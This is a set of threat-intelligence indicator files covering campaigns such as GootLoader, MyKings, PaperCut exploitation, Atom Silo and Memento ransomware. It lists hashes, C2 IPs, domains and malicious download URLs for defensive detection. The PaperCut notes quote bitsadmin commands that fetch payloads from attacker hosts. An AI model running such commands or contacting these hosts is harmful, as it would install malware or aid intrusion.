sha256,5f3fd50715aabf43cc6edb5f38026a3baa37a7fd7a17ae232fc65e186c83befb,msedge_elf.dll (HUI Loader), 10 | sha256,4fcbc598c5699ea48a1edd8dda065eab210f09ad900ab167cb5abdf9841dd2b7,hideschtasks.exe (Custom binary; remotely creates scheduled tasks), 11 | sha256,755b14ad83da2f2eff8ef8bf83ed74c6d96f6b3b3fde95d4c13d8cb75d861631,log.ini (Masquerading DLL generating C2), 12 | sha256,44e0c61f70f44e3a35ecde9b49a623973727d3aa68922ef4e1ff8dfc74795582,11.log (LSASS credential interceptor), 13 | sha256,a1a8adae91daa96deb01326c702fec388d0fa983f299de3f1bdb8a277df64423,1.dat (Cobalt Strike), 14 | 
sha256,3a85c36fff48b223f6edd722bc1603a1fd9b00d3e4d46a88151c4b1b696d90d1,sssa.exe (Malicious file), 15 | sha256,62c9b97a849f40f4b5b167b96a54fa1ef03624ac8f2972b641af8ca5d00b5db0,McPvNs.dll (Malicious DLL sideloaded by McPvTray.exe), 16 | sha256,c1d818f18c7160807d9031e024fcc6429476d6455221e3aa988c6245269fbcc8,"rsndispot.sys , EDR evasion", 17 | sha256,ea8c8f834523886b07d87e85e24f124391d69a738814a0f7c31132b6b712ed65,"rspot.sys, EDR evasion", 18 | ip,198.13.47.158,PocoProxy C2, 19 | ip,64.176.50.42,PocoProxy C2, 20 | ip,158.247.241.188,PocoProxy C2, 21 | domain,www.googlespeedtest33.com,PocoProxy C2, 22 | ip,139.180.217.105,PocoProxy C2, 23 | ip,45.130.229.181,Cobalt Strike C2, 24 | ip,185.201.8.187,Cobalt Strike C2, 25 | -------------------------------------------------------------------------------- /crimson_palace_stac1870_bravo.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes,,,, 2 | sha256,92e2dafb6d91ac7bc725e680d53cfbfcc854033d14f6e4807fd0169c605324d2,3.ps1 (PowerShell script),,,, 3 | sha256,DCC938AF8FB2964A1F35ADFB221DE76FFC0BD0CCAAC91455B3638FD4DC33E8C0,EvtxParser.exe (EVTX dump),,,, 4 | sha256,0c3baa012cdb518982ec4ae954b395f3d6b9544ead8e050370219fa584f74f3c,2.vbs (VBS script),,,, 5 | sha256,c679a2453697c51776b8a64d59fb8bf4172906e9a4f91b3872774bd05378d28c,r.vbs (VBS script),,,, 6 | sha256,edd0c859424ab953a92ef20cfc8b938f469253122485915d6de80d314b18b08f,mscorsvc.dll (CCoreDoor),,,, 7 | sha256,55277d86c0707459500dbb16915665ae611d3a4e4597d51599ea8b8fe6f85f29,mscorsvc.dll (CCoreDoor),,,, 8 | sha256,a70e8317a608dd6ea0ad8564b089a153a7e3ab7ef763899d3d806141e820148e,"ntpsapi.dll (signed, benign, ntdll.dll used for EDR unhooking)",,,, 9 | domain,message.ooguy.com,CCoreDoor C2,,,, 10 | ip,146.190.93.250,CCoreDoor C2,,,, 11 | -------------------------------------------------------------------------------- /email account compromise 365 2023-06.csv: 
-------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | ip,104.161.20.102,used to log into compromised accounts 3 | ip,185.241.149.122,used to log into compromised accounts 4 | ip,20.232.202.245,used to log into compromised accounts 5 | url,botasso.cl,observed in transport rules and Tenant Allow / Block lists 6 | url,smtp83.iad3a.emailsrvr.com,observed in transport rules and Tenant Allow / Block lists 7 | url,continental-database.com,observed in transport rules and Tenant Allow / Block lists 8 | -------------------------------------------------------------------------------- /fleeceware-chatbot-apps.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/05/17/fleecegpt-mobile-apps-target-ai-curious-to-rake-in-cash,Indicators of fleeceware mobile apps 3 | sha256,2ea59ed7c2cde6b48837cec65a3382d4d257ea18b6604ae5a14b792059acf438,chatgpt.openai.gpt.chat 4 | sha256,ecd044f1e6fa3bf8e1963743e435599b4a74a29d1bfb863bb4fe926aaa05a2c0,com.smartremote.chatgpt 5 | -------------------------------------------------------------------------------- /gootloader_cats_iocs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | Domain,"hxxps[://]ledabel[.]be/en/are-bengal-cats-legal-in-australia-understanding-the-laws-and-regulations/#:~:text=In%20most%20cases%2C%20you%20do,a%20Bengal%20cat%20in%20Australia",URI the user clicked on; it downloaded the malicious Zip file. 3 | Domain,hxxps[://]www[.]chanderbhushan[.]com/doc[.]php,URI the malicious Zip file was observed connecting to. 4 | Domain,hxxps[://]serviciilaser[.]ro/xmlrpc.php,URI the malicious .js file was observed connecting to. 5 | ,, 6 | Domain,hxxps[://]metropole[.]com[.]au/xmlrpc.php,URI the malicious .js file was observed connecting to. 
7 | ,, 8 | ,, 9 | Domain,hxxps[://]fannisho[.]com/xmlrpc.php,URI the malicious .js file was observed connecting to. 10 | ,, 11 | ,, 12 | Domain,hxxps[://]gobranded[.]com/xmlrpc.php,URI the malicious .js file was observed connecting to. 13 | Domain,hxxps[://]climatehero[.]me/xmlrpc.php,URI the malicious .js file was observed connecting to. 14 | ,, 15 | Domain,hxxps[://]wyantgroup[.]com/xmlrpc.php,URI the malicious .js file was observed connecting to. 16 | ,, 17 | Domain,hxxps[://]rkbaienfurt[.]de/xmlrpc.php,URI the malicious .js file was observed connecting to. 18 | ,, 19 | Domain,hxxps[://]beezzly[.]com/xmlrpc.php,URI the malicious .js file was observed connecting to. 20 | ,, 21 | Domain,hxxps[://]playyourbeat[.]com/xmlrpc.php,URI the malicious .js file was observed connecting to. 22 | ,, 23 | Domain,hxxps[://]wowart[.]vn/xmlrpc.php,URI the malicious .js file was observed connecting to. 24 | ,, 25 | File,Are_bengal_cats_legal_in_australia_33924.zip,Malicious Zip file that was downloaded from the URI users clicked on. 26 | ,SHA256: 435f48667b32c3ab8bb806a8783c0fc40af86e6c5cbf6f621d6e1a3f331483ed, 27 | File,Are_bengal_cats_legal_in_australia_33924.js,The smaller JavaScript file extracted from Are_bengal_cats_legal_in_australia_33924.zip. Note that the numeric suffix differs per extraction. 28 | ,SHA256: ea781eef1da03ea2c3b5250ce26b00445d8a5123bbb0575c583211cca53c61db, 29 | ,, 30 | File,Rehabilitation Services.js,Heavily obfuscated larger JavaScript observed in association with the Scheduled task. This name also differs per execution of the payload. 
31 | ,SHA256: 9a7e79d4ff235feb12672979dfc073d2b4572233772ae500ef6b69c670a9820e, 32 | File,Huthwaite SPIN selling.dat,The name will vary upon execution 33 | File,Small Units Tactics.js,The name will vary upon execution 34 | ,SHA256: 5f2c97499943878d853332da541138bd6ccbafca7e00d6f90d06545b27b66ca3, 35 | Scheduled Task,Destination Branding,The name will vary upon execution -------------------------------------------------------------------------------- /malware-MyKings-domains: -------------------------------------------------------------------------------- 1 | 03264.5b6b7b.ru 2 | 032down.f4321y.com 3 | 032down.mykings.pw 4 | 032down.mys2016.info 5 | 032down.mysking.info 6 | 032js.f4321y.com 7 | 032js.mykings.top 8 | 032look.gamesoxalic.com 9 | 032u.f321y.com 10 | 032up.f4321y.com 11 | 032up.mykings.pw 12 | 032wmi.1217bye.host 13 | 032wmi.oo000oo.club 14 | 032www.mykings.pw 15 | 032www.wmi.oo000oo.club 16 | 032xmr.5b6b7b.ru 17 | 1217bye.host 18 | 1226bye.xyz 19 | 1down.mysking.info 20 | 2.b5w91.com 21 | 2e68a4e1c6.pw 22 | 5b6b7b.ru 23 | 5b6b7b.rujs.5b6b7b.ru 24 | 64.5b6b7b.ru 25 | 795267de78.pw 26 | access.mys2016.info 27 | acpananma.com 28 | ae161719e7.pw 29 | aodr.tnaf.mys2016.info 30 | autodiscover.y17t36.mys2016.info 31 | b5w91.com 32 | bakafohnheey.mys2016.info 33 | catsmeowalot.com 34 | cc.rarxmr.5b6b7b.ru 35 | cianjur-liker.mys2016.info 36 | ciyawitavu9.mys2016.info 37 | cnc.f321y.com 38 | cnc.f4321y.com 39 | color.mys2016.info 40 | cpanel.acpananma.com 41 | cpanel.bokepkitasemua.n.mys2016.info 42 | docs.5b6b7b.ru 43 | down.5b6b7b.ru 44 | down.down0116.info 45 | down.f321y.com 46 | down.f4321y.com 47 | down.my0115.ru 48 | down.mykings.pw 49 | down.mys2016.info 50 | down.mys206.info 51 | down.mysking.info 52 | down.oo000oo.club 53 | down0116.info 54 | down2.b5w91.com 55 | duniagamees.mys2016.info 56 | dwon.f321y.com 57 | f321y.com 58 | f4321y.com 59 | fisica.mys2016.info 60 | fra.gamesoxalic.com 61 | ftp.1226bye.xyz 62 | ftp.ftp0930.host 63 | 
ftp.oo000oo.mewmi.mykings.top 64 | ftp.oo000oo.mewmi.oo000oo.clubdown.oo000oo.club 65 | ftp.ruisgood.ru 66 | ftp0930.host 67 | gamesoxalic.com 68 | gemsku18.mys2016.info 69 | gvk2016.ru 70 | hadiah.mys2016.info 71 | img4.mys2016.info 72 | jobber.gamesoxalic.com 73 | js.1226bye.xyz 74 | js.5b6b7b.ru 75 | js.5b6b7b.ru 76 | js.f4321y.com 77 | js.ftp0930.host 78 | js.my0115.ru 79 | js.mykings.pw 80 | js.mykings.top 81 | js.mys2016.info 82 | js.oo000oo.club 83 | kr1s.ru 84 | kriso.ru 85 | lmconf.mys2016.info 86 | look.gamesoxalic.com 87 | mail.acpananma.com 88 | mail.catsmeowalot.com 89 | mail.neweventpubgm.mys2016.info 90 | massage.gamesoxalic.com 91 | mewmi.mykings.top 92 | mitiorit.mys2016.info 93 | ms1128.site 94 | my0115.ru 95 | mykings.pw 96 | mykings.top 97 | mys2016.info 98 | mysking.info 99 | nb.ruisgood.ru 100 | nb1.ruisgood.ru 101 | ndown.mykings.pw 102 | never.mys2016.info 103 | ns1.catsmeowalot.com 104 | ns2.catsmeowalot.com 105 | nup.mykings.pw 106 | o5e9x4q.votiima.mys2016.info 107 | oil.mys2016.info 108 | oo000oo.club 109 | own.mykings.pw 110 | own.mys2016.info 111 | p.mykings.pw 112 | rucop.ru 113 | ruisgood.ru 114 | rza.electroshield.ru 115 | scene.mys2016.info 116 | teksten.mys2016.info 117 | tp.ftp0930.host 118 | u.f321y.com 119 | up.f4321y.com 120 | up.ms1128.site 121 | up.mykings.pw 122 | ups.mykings.pw 123 | wap.mys2016.info 124 | webdisk.acpananma.com 125 | webmail.acpananma.com 126 | webmail.aku.n.mys2016.info 127 | wmi.1217bye.host 128 | wmi.my0115.ru 129 | wmi.mykings.top 130 | wmi.oo000oo.club 131 | wn.mykings.pw 132 | x4v2h4q.kaktakoi.mys2016.info 133 | xl.mys2016.info 134 | xmr.5b6b7b.ru 135 | xmr.xmr5b.ru 136 | xmr5b.ru 137 | y16t05.mys2016.info 138 | y16t26.mys2016.info 139 | -------------------------------------------------------------------------------- /ms-msdt restore registry key.reg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/sophoslabs/IoCs/4b06149929305d1431a425d2b271a0e04f855f4a/ms-msdt restore registry key.reg -------------------------------------------------------------------------------- /papercut-nday-indicators-of-compromise.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/04/27/increased-exploitation-of-papercut-drawing-blood-around-the-internet/,"IoCs for PaperCut attack campaign, April 2023" 3 | sha256,0ce7c6369c024d497851a482e011ef1528ad270e83995d52213276edbe71403f,Cobalt Strike DLL 4 | sha256,38d2f150616fa1b2a989a3b97edf07bf13948441f49709f8c2605b0e3d881b44,"Coin miner, TOR communication" 5 | ip,192.184.35.216,Psychz Networks 6 | ip,216.122.175.114,Colocation America 7 | ip,137.184.56.77,Digital Ocean 8 | ip,45.159.248.244,STARK-INDUSTRIES.SOLUTIONS 9 | ip,185.254.37.173,Serverion 10 | ip,185.254.37.236, 11 | ip,23.184.48.17, IncogNet LLC 12 | url,upd488.windowservicecemter.com/download/setup.msi,Atera Agent 13 | url,study.abroad.ge:443/wp-content/stuff/winlogon.bin,Cobalt Strike C2 connection 14 | url,upd488.windowservicecemter.com,C2 15 | url,upd488.windowservicecemter.com/download/a2.msi,Atera Agent 16 | url,upd488.windowservicecemter.com/download/a3.msi , 17 | url,upd488.windowservicecemter.com/download/AppPrint.msi,Synchro MSP 18 | url,tmpfiles.org/dl/1337855/enc.txt,Ransomware Download 19 | url,50.19.48.59:82/me1.bat,Coin miner script 20 | url,137.184.56.77:443/for.ps1, 21 | url,137.184.56.77:443/c.bat, 22 | url,4.tcp.ngrok.io:14573,Ngrok (Ingress as a service secure app tunnel) 23 | url,45.159.248.244:8000/wow,Stark Industries 24 | url,159.65.42.223/r/ppc/02E663CA8C405746/,Digital Ocean 25 | url,185.254.37.173:443/8a293f2ddb634472a3e8b1ede4e81577.Php?,Serverion 26 | url,185.254.37.236/ppc,Serverion 27 | domain,upd343.winserverupdates.com,Cloudflare hosted C2 28 | domain,ber6vjyb.com,Truebot C2 29 | 
url,http://192.184.35.216:443/4591187629.exe,Downloads coin miner (bitsadmin /transfer mydownloadjob /download /priority normal http://192.184.35.216:443/4591187629.exe %WINDIR%setup2.exe) 30 | url,http://23.184.48.17/bootcamp.zip,DWAgent (bitsadmin /transfer dwa /download /priority FOREGROUND http://23.184.48.17/bootcamp.zip C:\ProgramData\bootcamp.zip) 31 | domain,cdn-backdl.com,C2 for NetSupport Download 32 | domain,Jojojovan1.com,NetSupport C2 33 | domain,Jojojovan2.com,NetSupport C2 34 | sha256,1097975f1dede47a8ef80bab26c6fed7e3db70f033ad86ec77567351379dadd3,upd488.windowservicecemter.com/download/a2.msi 35 | sha256,00ec44df6487faf9949cebee179bafe8377ca4417736766932508f94da0f35fe,upd488.windowservicecemter.com/download/AppPrint.msi 36 | sha256,d8d49f34f57ce54da60a0d2edf8c7924525b1dd1dcccdead18273a97282ffa94,upd488.windowservicecemter.com/download/a3.msi 37 | sha256,f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb,upd488.windowservicecemter.com/download/setup.msi 38 | sha256,0ce7c6369c024d497851a482e011ef1528ad270e83995d52213276edbe71403f,upd488.windowservicecemter.com/download/update.dll 39 | sha256,582b72bb0f0088aaad17f3aeab98654ede6fed18b5c7f48c1a593e4ec0076a4d ,bootcamp.zip file 40 | sha256,3b326a3e4f0a03db859feeed7e4e3a832acdaeaf8b2cd69ecc0dce73c1a225c9 ,me1.bat 41 | sha256,45729491ec4ae2065672e6d93a3aa7533a8058cecb8fcdb79ecd5d10cfa2aeca ,me2.bat 42 | sha256,487d47985cddf204a94cfd41bd2d89798cdc03c4df8a582ecfe885eeb374a8ae ,winlogon.bat 43 | -------------------------------------------------------------------------------- /raccoonstealer.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Indicators from https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/, 3 | sha256,be351f0654045ac95d35f21dc94576adfcd8ee976f48f430db9be75569cd95f8, 4 | 
sha256,71f97ec74c9d00a4c22c2905692dd1933c0ec86afa8fe7800fcb06a92fc933ee, 5 | sha256,f15ec4e938667248ae7ec3f0c754bafa8b1978cd5ee043755854783d78d06ab9, 6 | sha256,1935d92f1fbc8a6ef85e72c7b25d80dabe8ea7db42c42446a3c01076c3aad750, 7 | sha256,38b605f9fac77ac0bf9b13067a13fe02ac76ebee5fbd11a0e0ca869f268a6b3c, 8 | sha256,5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d, 9 | sha256,14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e, 10 | sha256,5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d, 11 | sha256,e10a97b02915dc3b2962603b9d173043906c4ecb865c7a8a64c6dcee66d30967, 12 | sha256,ea50f0afe88df5256b2f596b8ecde1f12779f496cd9a7d482d2182d6f789a57f, 13 | sha256,d9bb8e2ccfb5f98ca1097224493dc4f166291ee7b11fd13eaf9d0ef3cd379807, 14 | sha256,e950dd74f002df712925abe0c8ed18cc0cf38c53e5cb57eb68610e00da14c0f3, 15 | domain,cheapdealnow.top, 16 | domain,f0473248.xsph.ru, 17 | domain,xsph.ru, 18 | domain,bbhmnn778.fun, 19 | domain,telete.in/jbitchsucks, 20 | ip,88.99.66.31, 21 | path,/gate/log.php, 22 | path,/gate/sqlite3.dll, 23 | path,/gate/libs.zip, 24 | url,f0473248.xsph.ru/ApplicationFrameHost.exe, 25 | -------------------------------------------------------------------------------- /ransomware_atomsilo.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note,, 2 | filename,mfc.ini,WMIexec-style Backdoor (Cobalt Strike Beacon),, 3 | file_path_name,C:\Windows\debug\mfc.ini,WMIexec-style Backdoor (Cobalt Strike Beacon),, 4 | sha256,7335dddffe5d932f57752f9bafd7e57aaf2a9be1b9fa29f549e4e36d9b9dc876,WMIexec-style Backdoor (Cobalt Strike Beacon),, 5 | sha256,233e5fb47b9046c14732d0d777096ac3704352c7ee68dab66dea1f5a4a1c81df,Troj/Agent-BHUN,, 6 | sha256,d3a2d4ba16add4a2c961fc907355ac994dceedd4fb56aa1bc2d76b9bdef77bd8,ATK/KDUtil-A,, 7 | filename,autologin.sys,Troj/KillAV-IT,, 8 | file_path_name,C:\windows\temp\autologin.sys,Troj/KillAV-IT,, 9 | 
sha256,c232b3d1ea2273b8ad827724c511d032cda7f2c66567638abf922a5d5287e388,Troj/KillAV-IT,, 10 | filename,2.exe,Troj/ProcKill-F,, 11 | sha256,1ec631ff331f3177fb8f8da635f789ef02b90cc4ec0abf9d0122e0bc2b400151,Troj/ProcKill-F,, 12 | filename,FuckGPO.exe,Mal/DotNet-L,, 13 | sha256,3abcf9ab068be27ffce12bbbb9b5cd161a1beb312e639e72242f60bb6df9bc8a,Mal/DotNet-L,, 14 | filename,autoupdate.exe,Troj/Ransom-GKL,, 15 | sha256,5fa490668a9963e97d956f9a3b0c746b1d16eee9a73dfba875c9a3dc0e2c0d1b,Troj/Ransom-GKL,, 16 | filename,autologin.exe,ATK/KDUtil-A,, 17 | sha256,7b7b967a0f3de70c84f0f318de6f2c6382ebc4f4037e0c1b5f6c3155c263efe7,ATK/KDUtil-A,, 18 | sha256,eca9fac6848545ff9386176773810f96323feff0d575c4b6e1c55f8db842e7fe,AppC/Rclone-A,, 19 | filename,zy.exe,AppC/Rclone-A,, 20 | ip,27.1.1.34 ,C2 Atom Silo,, 21 | ip,41.226.2.178 ,C2 Atom Silo,, 22 | ip,213.152.165.29 ,C2 Atom Silo,, 23 | ip,213.152.165.30,C2 Atom Silo,, 24 | url,https://pastebin.com/raw/iL4qbi4S,Coinminer C2,, 25 | url,https://update.ajaxrenew.com:80/functionalStatus/VDcrCtBuGm8dime2C5zQ3EHbRE156AkpMu6W?_=BMJGPDBAJFIKGNADKCNLFGFHFPDGKPCBJDIPDMHOGDPCDEDMDGFPDCOPLDIJOEFLOPLKEFKEFGOEMAJGKCDGNNGDGAICEHKJPOJMPGHAHAJNCPMKCPPHOIOCLIIPJNLPMKEIEMFADHKEOHALNBPNLFFCLOMFKJOLGJFHKGALKPAKKJIDIBEJDHFMKPMMCNPBLDGICIIFJBDLGBMKLLLDHJAJIMMNNLGCPCKCBLOCDKJMGHCCCFGPMIEKLMEBFLBK,C2 Atom Silo,, 26 | domain,update.ajaxrenew.com,C2 Atom Silo,, 27 | url,http://27.1.1.34:8080/docs/s/wi.txt,XMRig miner installer (Troj/BatDl-GE),, 28 | url,http://222.122.47.27:2143/auth/xmrig.exe,XMRig miner download URL,, 29 | url,http://139.180.184.147:45532/fake.php,C2 Atom Silo,, -------------------------------------------------------------------------------- /ransomware_memento.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Notes 2 | filename,main.exe,Memento team ransomware 3 | sha256,7793b3b3545da61a7a073e64ac22c60fa38df8fbf0bbc95721a814992857c67a,Memento team ransomware variant 4 | 
sha256,48c6d499618d81280f7aa3acf6aecc2f37983f527f4a729b133ae6fca20ec8c7,Memento team ransomware variant 5 | sha256,91854f69ae78f5b5627c9e8800a1e5ef6f56b47a0193f03e260e362905770052,Memento encryption filter 6 | filename,filter.txt,Memento team ransomware variant 7 | filename,r.exe,WinRAR copy 8 | sha256,07e1e386d8ffcc5b5ef1e55d6fb31a210522e2d9f1955dc24ba5c43523813612,WinRAR copy 9 | filename,config.key,Public key for Memento encryption 10 | filename,RuntimeBroker.exe,Memento team ransomware variant 11 | sha256,6a4729fc8fc796318b44841e322c1f3bee37b2737e359e5e5b777d8855b370a6,Memento team ransomware variant 12 | sha256,09a0caadc4df3d4278368f94f52007894c2b51d3785d985cb8e42646e8a33b68,Memento team ransomware variant 13 | filename,RuntimeScheduler.exe,Memento team ransomware variant 14 | filename,kbview.bat,Batch file for deployment of keylogger 15 | filename,wincert.bat,Persistent C2 batch file 16 | sha256,ca57391cdbac224f159e858425d231d068aa76316e0345cb8d58c716b9eff587,Plink SSH connector 17 | filename,pl.exe,Plink SSH connector 18 | filename,plin.exe,Plink SSH connector 19 | filename,BCWipeTM.exe,BestCrypt Wipe utility 20 | sha256,3037956db905355f66cbd02ad9778f86551b0c34f386ee0adb7c2feb941a0e30,BestCrypt Wipe utility 21 | filename,BCShExt.dll,BestCrypt shell extension 22 | sha256,e9a096c886ce42c2dec0fae1492c2943a2e321fcff2a5697d1689ff146f4b4b6,BestCrypt shell extension 23 | sha256,654ad61bc4de2b9ad07add2dc7a6de22d24436f699bdb7923c7f510ee67b7e0a,BestCrypt shell extension 24 | filename,BCWipeSvc.exe,BestCrypt Wipe utility 25 | sha256,952476a3ead7a97ff9c4906a2801ad993e4850a3e10c4350bbd44ab2eeabbb02,BestCrypt Wipe utility 26 | filename,bcupdt.exe,BestCrypt Updater 27 | sha256,ceec3cbb3a97c6be2c0446fcd74134ab8feec66f985bc50f17fb41350494c6ef,BestCrypt Updater 28 | filename,bcview.exe,Part of BCWipe utility 29 | sha256,1a186d51bb4e4fd18acad387b2872d164e3a772e935b26c9fc673fdf53ccb533,Part of BCWipe utility 30 | filename,bcwipe.exe,BestCrypt Wipe utility 31 | 
sha256,8327eb8465d62959a40ea487c0fd0da178a8857e4b49a1594c5a2df3631ca179,BestCrypt Wipe utility 32 | filename,bcwipegui.exe,BestCrypt Wipe utility 33 | sha256,0bd68bd1e4567f15bc81c31d37971a71fc870781acb4cab0f51c675dcd779b5b,BestCrypt Wipe utility 34 | filename,insbcbus.exe,BestCrypt Wipe utility 35 | sha256,d415ac7805edf8d634fbe6ac913e1e53a0d2ea0fce5146e0054056458a2a8f96,BestCrypt Wipe utility 36 | filename,logview.exe,Jetico Log Viewer 37 | sha256,cd7c9f1bd77e304a913758e95597d96399f823d887d7787fd8e9d8ec7a921d38,Jetico Log Viewer 38 | filename,taskeng.exe,keylogger 39 | sha256,e54d9a45850786f52b8169eceb1be0a4e21d5d000b933dda470b00d17c8fb169,keylogger 40 | filename,mimikatz.exe,Mimikatz credential stealer 41 | sha256,31eb1de7e840a342fd468e558e5ab627bcb4c542a8fe01aec4d5ba01d539a0fc,Mimikatz credential stealer 42 | filename,secretsdump.exe,secretsdump.py compiled hash stealer 43 | sha256,c3405d9c9d593d75d773c0615254e69d0362954384058ee970a3ec0944519c37, 44 | filename,wmiexec.exe,WMIexec backdoor 45 | sha256,14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8,WMIexec backdoor 46 | filename,nm.exe,NMAP 47 | sha256,14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8,NMAP 48 | filename,tmp5FE0.tmp.exe,BitCoinMiner 49 | sha256,3bed84f229f5e8ca22c3768a7430ceb5e6e9ecb611df55691f07039e618f265b,BitCoinMiner 50 | filename,npcap-0.93.exe,NMAP PCAP driver installer 51 | sha256,c3757e7f49bd40012ef9cd320568c401bad1ba1843a4055b11bebc2f10bd83ca,NMAP 52 | filename,TxR.exe,Memento dropper for SSH reverse shell and web exfiltration 53 | sha256,1767cb41af0bbedf8554c5ddf7968cc1e039a06b7e4b7f9cd42ed4dd301bf02f,Memento dropper for SSH reverse shell and web exfiltration 54 | filename,nssm.zip,Non-Sucking Service Manager install payload 55 | filename,config.json,XMRig configuration file 56 | filename,peview.exe,Process Hacker PE viewer 57 | filename,ProcessHacker.exe,Process Hacker 58 | filename,GoogleChangeManagement.xml,Persistent SSH reverse shell configuration 
file 59 | filename,MicrosoftOutLookUpdater.bat,Persistent SSH reverse shell batch file 60 | filename,MicrosoftOutLookUpdater.exe,Plink SSH connector 61 | filename,MicrosoftOutlookUpdateSchedule.xml,Persistent SSH reverse shell configuration file 62 | ip,78.138.105.150,Memento ransomware callhome 63 | ip,183.110.224.164,compromised site used for remote PowerShell 64 | ip,27.102.66.114,SSH connection 65 | ip,123.45.67.89,keylogger download 66 | ip,169.51.60.221,Source of file loaded to memory by malicious PowerShell 67 | ip,27.102.127.120,SSH connection 68 | ip,45.77.76.158:25643,Remote script source for BitCoinMiner 69 | ip,190.144.115.54:443,remote script source for XMR miner 70 | ip,195.201.124.214:10001,Mimu XMR miner callhome 71 | url,hxxp://78.138.105.150:11180/sv.php,Memento Ransomware C2 address 72 | domain,checkvisa.xyz,remote PowerShell 73 | domain,novelengine. com,compromised site used for remote PowerShell 74 | url,https://google.onedriver-srv.ml/gadfTs55sghsSSS,Callhome for exfiltration 75 | url,169.51.60.221:1331/en-us/docs.html?type=&v=1,source for remote script executing XMRig miner 76 | url,27.102.127.120/r.exe,remote copy of WinRAR 77 | url,hxxp://45.77.76.158:25643/w,Remote script source for BitCoinMiner 78 | domain,google.onedriver-srv.ml,SSH reverse shell and web exfil host 79 | url,transfer.sh/cnPW0x/Connector3.exe,Backdoor download location 80 | url,hxxp://190.144.115.54:443/mine.bat,miner remote script 81 | url,hxxp://27.102.127.120/x1.rar,Memento tool remote archive 82 | url,hxxp://27.102.127.120/x2.rar,Memento tool remote archive 83 | url,hxxp://27.102.127.120/r.exe,Memento tool download 84 | url,hxxp://lurchmath.org/wordpress-temp/wp-content/plugins/xmrig.zip,XMRig remote archive 85 | url,hxxps://raw.githubusercontent.com/c3pool/xmrig_setup/master/xmrig.zip,XMRig remote archive 86 | -------------------------------------------------------------------------------- /repository-backdoor-IOCs.csv: 
-------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | Description,IOCs related to backdoored repository campaign,https://news.sophos.com/en-us/2025/06/04/the-strange-tale-of-ischhfd83-when-cybercriminals-eat-their-own 3 | url,https://rlim.com/pred-FMoss/raw,Intermediate payload 4 | url,https://paste.fo/raw/e79fba4f734e,Intermediate payload 5 | url,https://pastejustit.com/raw/16qsebqoqq,Intermediate payload 6 | url,https://rlim.com/seraswodinsx/raw,Intermediate payload 7 | url,https://popcorn-soft.glitch.me/popcornsoft.me,Intermediate payload 8 | url,https://pastebin.com/raw/LC0H4rhJ,Intermediate payload 9 | url,https://pastejustit.com/raw/tfauzc15xj,Intermediate payload 10 | url,https://rlim.com/drone-SJ/raw,Intermediate payload 11 | url,https://paste.fo/raw/6c2389ad15f1,Intermediate payload 12 | url,https://pastebin.com/raw/ZTrwn94g,Intermediate payload 13 | url,https://pastejustit.com/raw/zhpwe7mrif,Intermediate payload 14 | url,https://pastebin.com/Jet0TFpK,Intermediate payload 15 | domain,https://556d807df8c8a5fe567f66701b2ce4a5.arturshi.ru/tg/webhook/86703,C2 16 | url,https://github.com/unheard44/fluid_bean/releases/download/releases/SearchFilter.7z,Repository hosting malware 17 | filename,SearchFilter.7z,Malware 18 | filename,antiDebug.ps1,Evasion script 19 | filename,disabledefender.ps1,Evasion script 20 | filename,disabledefenderv2.ps1,Evasion script 21 | sha256,577c1e288b1d7ef69330a86f0c14d06bb67980fba64896aadf556f52b770cf56,SearchFilter.7z 22 | sha256,f062c7884844da7535cb7b4e7e0a517856022fbd410eb62ecf661fded2c473bc,SearchFilter.exe 23 | sha256,bcca9de329754c6719b4829919dcb0603f8a5c29a36ab83f9d88a5aa2d00e2d6,app.asar 24 | sha256,77a5d2b1fa0660f307bfe34294ff612556418685c87fead07e00c43721609a2e ,liberarComSMS.js 25 | sha256,823da5ffec1b9eed87301fc4685009e4673d72a47e1acec4baeee6df27634d51,linea.js 26 | sha256,a53ac7466290c9f1e92f8c953d3068f7e72df2929972aa8d4a31a2485009862c,AnyDesk Exploit.vbproj 27 | 
sha256,cb1617e2ffbf07f9e897beddf8565965e881d4b4f45dda9ba30f5e1304d8ec11,Apex Legends External Cheat.vcxproj 28 | sha256,4f1f9a9e7f3457f7b67dbe899781d81b616c3ec57b08230cb4bcb9279c87d9c2,Apex Legends Internal Cheat.vcxproj 29 | sha256,12f1e6fadf3e9ba2d1feef21d3c852a1d56922b934096247d4b3df54df5af6ec,Aviator-Hack.csproj 30 | sha256,9ef04f50bc95f9a20c09c636f2783e5cefc8b31c8938ba2ed6b9d92d838f4b07,Aviator-Hack.csproj 31 | sha256,585a9fc16ab2739d9db390004272c3c26817f7d548ff4a9a3a6d3d992a14dc87,COD Warzone-2 Cheat.vcxproj 32 | sha256,23eda28b82baac326c5878b67510e453603e68e3dfa5dfabd92b145cf95a3e76,CS2External.vcxproj 33 | sha256,03e1ad603d31b6b116ce0f459986791eb661d5245f9b52e278cd005ec3e081a4,DayZ Cheat.vcxproj 34 | sha256,95be742a617e91d276956b95419667b442f68d43145f6d7ffe70581b4b5b5587,DLL Injector V4.vcxproj 35 | sha256,5d89d66fb5f1410c0ef745fecb286608db4bff9aedc68a8de3b5fb37c1c0f0e8,EFT-External-Cheat.vcxproj 36 | sha256,9cf5bece2cb9b43686cc0241883bd1932c8dc06e92e29b0e210e9f00e0ef2962,FiveM-External.vcxproj 37 | sha256,2b13b1b778356d779abcef5fa6150da9cba9520231a0775218bf6c7b466327dc,FiveM.vcxproj 38 | 